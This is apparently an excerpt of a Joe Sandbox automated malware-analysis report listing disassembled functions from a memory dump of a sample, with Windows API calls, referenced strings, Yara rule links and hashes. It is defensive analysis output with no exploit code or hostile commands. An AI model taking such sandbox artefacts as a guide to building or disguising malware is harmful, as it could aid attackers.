                                                                                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 00C1B41E
                                                                                                                                                  • _wcscmp.LIBCMT ref: 00C1B432
                                                                                                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 00C1B458
                                                                                                                                                  • _wcscmp.LIBCMT ref: 00C1B46C
                                                                                                                                                    • Part of subcall function 00BE385C: _iswctype.LIBCMT ref: 00BE3864
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                                                                                                  • String ID: %s%u
                                                                                                                                                  • API String ID: 3744389584-679674701
                                                                                                                                                  • Opcode ID: f48bde5d11bef6e240881270ca4d88fe595b68a29bfd3f0c0d1ca65df805444a
                                                                                                                                                  • Instruction ID: 8b60b6f585afc19cc9e4cbe2db17aef1fda00f6acf724e7412bbfeaeaec47c71
                                                                                                                                                  • Opcode Fuzzy Hash: f48bde5d11bef6e240881270ca4d88fe595b68a29bfd3f0c0d1ca65df805444a
                                                                                                                                                  • Instruction Fuzzy Hash: BFA1CC71204306ABD714DF24C884BEAB7E8FF49351F108629F9A9D21A1DB30EE95DF90
                                                                                                                                                  Function 00C1BA6D Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetClassNameW.USER32(00000008,?,00000400), ref: 00C1BAB1
                                                                                                                                                  • _wcscmp.LIBCMT ref: 00C1BAC2
                                                                                                                                                  • GetWindowTextW.USER32(00000001,?,00000400), ref: 00C1BAEA
                                                                                                                                                  • CharUpperBuffW.USER32(?,00000000), ref: 00C1BB07
                                                                                                                                                  • _wcscmp.LIBCMT ref: 00C1BB25
                                                                                                                                                  • _wcsstr.LIBCMT ref: 00C1BB36
                                                                                                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 00C1BB6E
                                                                                                                                                  • _wcscmp.LIBCMT ref: 00C1BB7E
                                                                                                                                                  • GetWindowTextW.USER32(00000002,?,00000400), ref: 00C1BBA5
                                                                                                                                                  • GetClassNameW.USER32(00000018,?,00000400,?,?), ref: 00C1BBEE
                                                                                                                                                  • _wcscmp.LIBCMT ref: 00C1BBFE
                                                                                                                                                  • GetClassNameW.USER32(00000010,?,00000400), ref: 00C1BC26
                                                                                                                                                  • GetWindowRect.USER32(00000004,?), ref: 00C1BC8F
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                                                  • String ID: @$ThumbnailClass
                                                                                                                                                  • API String ID: 1788623398-1539354611
                                                                                                                                                  • Opcode ID: 4f1701a4713d42f21a7956663d74593253eafdb3dfb7d5b8e463e5c998683389
                                                                                                                                                  • Instruction ID: 92e1b138e8a2e73ad78f384c544bec51eb587b53c8238c914fc34fd7c2c2f41d
                                                                                                                                                  • Opcode Fuzzy Hash: 4f1701a4713d42f21a7956663d74593253eafdb3dfb7d5b8e463e5c998683389
                                                                                                                                                  • Instruction Fuzzy Hash: F681EF710083059BDB04DF14C895FEAB7E8EF46314F0484AAFD999A096EB30DE85DFA1
                                                                                                                                                  Function 00C1B8B6 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __wcsnicmp
                                                                                                                                                  • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                                                  • API String ID: 1038674560-1810252412
                                                                                                                                                  • Opcode ID: 2ed550cc5d0d7971b7067de2ff23437dee9d76ba72bfe08e4015e877395d199d
                                                                                                                                                  • Instruction ID: 28a6440293143bb0ed921db50ee0f1318af3fef8e30646775ec735b6b497526d
                                                                                                                                                  • Opcode Fuzzy Hash: 2ed550cc5d0d7971b7067de2ff23437dee9d76ba72bfe08e4015e877395d199d
                                                                                                                                                  • Instruction Fuzzy Hash: 3931CF30A40205A6CB04FBA1CD43EEDB3F8AF21751F20457AF555B21D2FF566E44AA52
                                                                                                                                                  Function 00C1CB97 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • LoadIconW.USER32(00000063), ref: 00C1CBAA
                                                                                                                                                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00C1CBBC
                                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00C1CBD3
                                                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 00C1CBE8
                                                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00C1CBEE
                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00C1CBFE
                                                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00C1CC04
                                                                                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00C1CC25
                                                                                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00C1CC3F
                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00C1CC48
                                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00C1CCB3
                                                                                                                                                  • GetDesktopWindow.USER32(?), ref: 00C1CCB9
                                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00C1CCC0
                                                                                                                                                  • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00C1CD0C
                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 00C1CD19
                                                                                                                                                  • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00C1CD3E
                                                                                                                                                  • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00C1CD69
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3869813825-0
                                                                                                                                                  • Opcode ID: 71ff8c6fe44b19cf3625f84c554ac3af61ca495928fa406d93370ea8e1e10848
                                                                                                                                                  • Instruction ID: 9400c8c7ab691fa59f9200e080dbbad219c9414f1022acd0128971c807a68b33
                                                                                                                                                  • Opcode Fuzzy Hash: 71ff8c6fe44b19cf3625f84c554ac3af61ca495928fa406d93370ea8e1e10848
                                                                                                                                                  • Instruction Fuzzy Hash: FF516C70900709EFDB209FA8CE89BAEBBF5FF04705F100918F596E25A0DB74A994DB50
                                                                                                                                                  Function 00C4A7DE Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _memset.LIBCMT ref: 00C4A87E
                                                                                                                                                  • DestroyWindow.USER32(?,?), ref: 00C4A8F8
                                                                                                                                                    • Part of subcall function 00BD1821: _memmove.LIBCMT ref: 00BD185B
                                                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00C4A972
                                                                                                                                                  • SendMessageW.USER32(00000000,00000433,00000000,00000030,?), ref: 00C4A994
                                                                                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C4A9A7
                                                                                                                                                  • DestroyWindow.USER32(00000000), ref: 00C4A9C9
                                                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00BC0000,00000000), ref: 00C4AA00
                                                                                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C4AA19
                                                                                                                                                  • GetDesktopWindow.USER32(?,?), ref: 00C4AA32
                                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00C4AA39
                                                                                                                                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00C4AA51
                                                                                                                                                  • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00C4AA69
                                                                                                                                                    • Part of subcall function 00BC29AB: GetWindowLongW.USER32(?,000000EB,?,?,?,00BC1AE0,?,?,?,?,?,?,00BC1D8F,?,?,?), ref: 00BC29BC
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                                                  • String ID: 0$tooltips_class32
                                                                                                                                                  • API String ID: 1297703922-3619404913
                                                                                                                                                  • Opcode ID: a74d49aec7095aa7059978c43b8ee382cba958f7b2e4e2932cf06e9e5080441c
                                                                                                                                                  • Instruction ID: f74e306d93928f308aa39e04bb93afd5cd14775b717d51fc26b4dfafd3b317f7
                                                                                                                                                  • Opcode Fuzzy Hash: a74d49aec7095aa7059978c43b8ee382cba958f7b2e4e2932cf06e9e5080441c
                                                                                                                                                  • Instruction Fuzzy Hash: 2B719975580200AFE721CF28CC48F6B7BE5FB88304F244A1DF996972A1DB71EA41DB56
                                                                                                                                                  Function 00C4CCA6 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BC29E2: GetWindowLongW.USER32(?,000000EB,?,?,?,00BC1CE4,?), ref: 00BC29F3
                                                                                                                                                  • DragQueryPoint.SHELL32(?,?,?,?,?,?), ref: 00C4CCCF
                                                                                                                                                    • Part of subcall function 00C4B1A9: ClientToScreen.USER32(?,?,?,?,?,?,?,?,?,00C4C6BC,?,?,?), ref: 00C4B1D2
                                                                                                                                                    • Part of subcall function 00C4B1A9: GetWindowRect.USER32(?,?), ref: 00C4B248
                                                                                                                                                    • Part of subcall function 00C4B1A9: PtInRect.USER32(?,?,00C4C6BC,?,?), ref: 00C4B258
                                                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?,?,?,?), ref: 00C4CD38
                                                                                                                                                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00C4CD43
                                                                                                                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00C4CD66
                                                                                                                                                  • _wcscat.LIBCMT ref: 00C4CD96
                                                                                                                                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00C4CDAD
                                                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00C4CDC6
                                                                                                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00C4CDDD
                                                                                                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00C4CDFF
                                                                                                                                                  • DragFinish.SHELL32(?), ref: 00C4CE06
                                                                                                                                                  • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00C4CEF9
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                                                                                  • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                                  • API String ID: 169749273-3440237614
                                                                                                                                                  • Opcode ID: afd12438d5ba8832da7eec75383fb4e43819ff1b7423ad257ef75ae925078fac
                                                                                                                                                  • Instruction ID: 3e6fcec3f7e9d48483bfb03b314d3d11b7febaf362aa2036c72736ced432fd79
                                                                                                                                                  • Opcode Fuzzy Hash: afd12438d5ba8832da7eec75383fb4e43819ff1b7423ad257ef75ae925078fac
                                                                                                                                                  • Instruction Fuzzy Hash: E9614971508301AFC701EF54DC85E9FBBE8FF88750F100A2EF595922A1EB709A49CB52
                                                                                                                                                  Function 00C282D5 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 378COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • #8.OLEAUT32(00000000,00000000,?,?,?,?,?,?,0000002A,00000000,00C50980), ref: 00C2831A
                                                                                                                                                  • #10.OLEAUT32(00000000,?,?,?,?,?,?,0000002A,00000000,00C50980), ref: 00C28323
                                                                                                                                                  • #9.OLEAUT32(00000000,?,?,?,?,?,0000002A,00000000,00C50980), ref: 00C2832F
                                                                                                                                                  • #185.OLEAUT32(?,?,?,?,0000002A,00000000,00C50980), ref: 00C2841D
                                                                                                                                                  • __swprintf.LIBCMT ref: 00C2844D
                                                                                                                                                  • #220.OLEAUT32(?,?,?,?,?,00000029,00000000,Default), ref: 00C28479
                                                                                                                                                  • #8.OLEAUT32(?,?,00000000,00000000), ref: 00C2852A
                                                                                                                                                  • #6.OLEAUT32(?,?), ref: 00C285BE
                                                                                                                                                  • #9.OLEAUT32(?), ref: 00C28618
                                                                                                                                                  • #9.OLEAUT32(?), ref: 00C28627
                                                                                                                                                  • #8.OLEAUT32(00000000,00000000,?,00000000,00000000), ref: 00C28665
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: #185#220__swprintf
                                                                                                                                                  • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                                                  • API String ID: 2563594795-3931177956
                                                                                                                                                  • Opcode ID: 1c61bfd5109d75f4f77116a32c96150874602e5dee8606dc17cf25abc05b35fe
                                                                                                                                                  • Instruction ID: bfc2959605c155cdccfcfb308d400ea04f1adbd86ac31bf30aa082db859be3da
                                                                                                                                                  • Opcode Fuzzy Hash: 1c61bfd5109d75f4f77116a32c96150874602e5dee8606dc17cf25abc05b35fe
                                                                                                                                                  • Instruction Fuzzy Hash: CED11271605226EBDB20DF66E884B6EB7F4FF04B00F248555E415ABA90DF70ED48DBA0
                                                                                                                                                  Function 00C449CF Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00C44A61
                                                                                                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000,00C50980), ref: 00C44AAC
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: BuffCharMessageSendUpper
                                                                                                                                                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                  • API String ID: 3974292440-4258414348
                                                                                                                                                  • Opcode ID: f70eacc64fd9daa3bd4fd41bba57324da828d75a6d9cd51de4dcd5525e7efe55
                                                                                                                                                  • Instruction ID: e588c01417524434764410773448c36ac408a1ceb8a8709b11af4b6c421bdf9c
                                                                                                                                                  • Opcode Fuzzy Hash: f70eacc64fd9daa3bd4fd41bba57324da828d75a6d9cd51de4dcd5525e7efe55
                                                                                                                                                  • Instruction Fuzzy Hash: F09150742047119BCB08EF11C891B6DB7E1BF94354F2488ADF8965B3A2DB31EE49DB81
                                                                                                                                                  Function 00C2E25D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetLocalTime.KERNEL32(?), ref: 00C2E31F
                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00C2E32F
                                                                                                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00C2E33B
                                                                                                                                                  • __wsplitpath.LIBCMT ref: 00C2E399
                                                                                                                                                  • _wcscat.LIBCMT ref: 00C2E3B1
                                                                                                                                                  • _wcscat.LIBCMT ref: 00C2E3C3
                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C2E3D8
                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00C2E3EC
                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00C2E41E
                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00C2E43F
                                                                                                                                                  • _wcscpy.LIBCMT ref: 00C2E44B
                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00C2E48A
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                                                                                  • String ID: *.*
                                                                                                                                                  • API String ID: 3566783562-438819550
                                                                                                                                                  • Opcode ID: d71b14066f931647630e645163b904b2a879879f6ac205dc283591dc34ff9180
                                                                                                                                                  • Instruction ID: fee4922f38cc26098d2e2a90d3148790114b7139a07a0b2a0fcb445e72a5f8d2
                                                                                                                                                  • Opcode Fuzzy Hash: d71b14066f931647630e645163b904b2a879879f6ac205dc283591dc34ff9180
                                                                                                                                                  • Instruction Fuzzy Hash: 406165725043559FCB10EF60D844E9EB3E8BF88310F04896EF99AD7251EB31EA45CB92
                                                                                                                                                  Function 00C2A27B Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • LoadStringW.USER32(00000066,?,00000FFF,?,00000000,?,?,00C3CF1B,?,?,00000035,?,00C5098C,?,?,00000016), ref: 00C2A2C2
                                                                                                                                                    • Part of subcall function 00BD1A36: _memmove.LIBCMT ref: 00BD1A77
                                                                                                                                                  • LoadStringW.USER32(00000072,?,00000FFF,?,?,00C3CF1B,?,?,00000035,?,00C5098C,?,?,00000016,?), ref: 00C2A2E3
                                                                                                                                                  • __swprintf.LIBCMT ref: 00C2A33C
                                                                                                                                                  • __swprintf.LIBCMT ref: 00C2A355
                                                                                                                                                  • _wprintf.LIBCMT ref: 00C2A3FC
                                                                                                                                                  • _wprintf.LIBCMT ref: 00C2A41A
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LoadString__swprintf_wprintf$_memmove
                                                                                                                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                                                                  • API String ID: 311963372-3080491070
                                                                                                                                                  • Opcode ID: 5ae60679df1fb3dec59aee36f1d2de74c96f5dae2847762194e583303fbc78b9
                                                                                                                                                  • Instruction ID: 6cc3dfa4e02492470f25814b3ef5806ddfd8abcd43063f5ac1247be9c43bbc91
                                                                                                                                                  • Opcode Fuzzy Hash: 5ae60679df1fb3dec59aee36f1d2de74c96f5dae2847762194e583303fbc78b9
                                                                                                                                                  • Instruction Fuzzy Hash: 12519E71900219BACF14EBE4DD46EEEF7B8AF04340F2045A6F505B2162EB356F58DB61
                                                                                                                                                  Function 00C20065 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00C0F8B8,00000001,0000138C,00000001,00000000,00000001,?,00C33FF9,00000000), ref: 00C2009A
                                                                                                                                                  • LoadStringW.USER32(00000000,?,00C0F8B8,00000001,0000138C,00000001,00000000,00000001,?,00C33FF9,00000000,00000001,?,00C33FF9,00000040,00000064), ref: 00C200A3
                                                                                                                                                    • Part of subcall function 00BD1A36: _memmove.LIBCMT ref: 00BD1A77
                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00C87310,?,00000FFF,?,?,00C0F8B8,00000001,0000138C,00000001,00000000,00000001,?,00C33FF9,00000000,00000001), ref: 00C200C5
                                                                                                                                                  • LoadStringW.USER32(00000000,?,00C0F8B8,00000001,0000138C,00000001,00000000,00000001,?,00C33FF9,00000000,00000001,?,00C33FF9,00000040,00000064), ref: 00C200C8
                                                                                                                                                  • __swprintf.LIBCMT ref: 00C20118
                                                                                                                                                  • __swprintf.LIBCMT ref: 00C20129
                                                                                                                                                  • _wprintf.LIBCMT ref: 00C201D2
                                                                                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010,?,Error: ,00C53B88,?), ref: 00C201E9
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
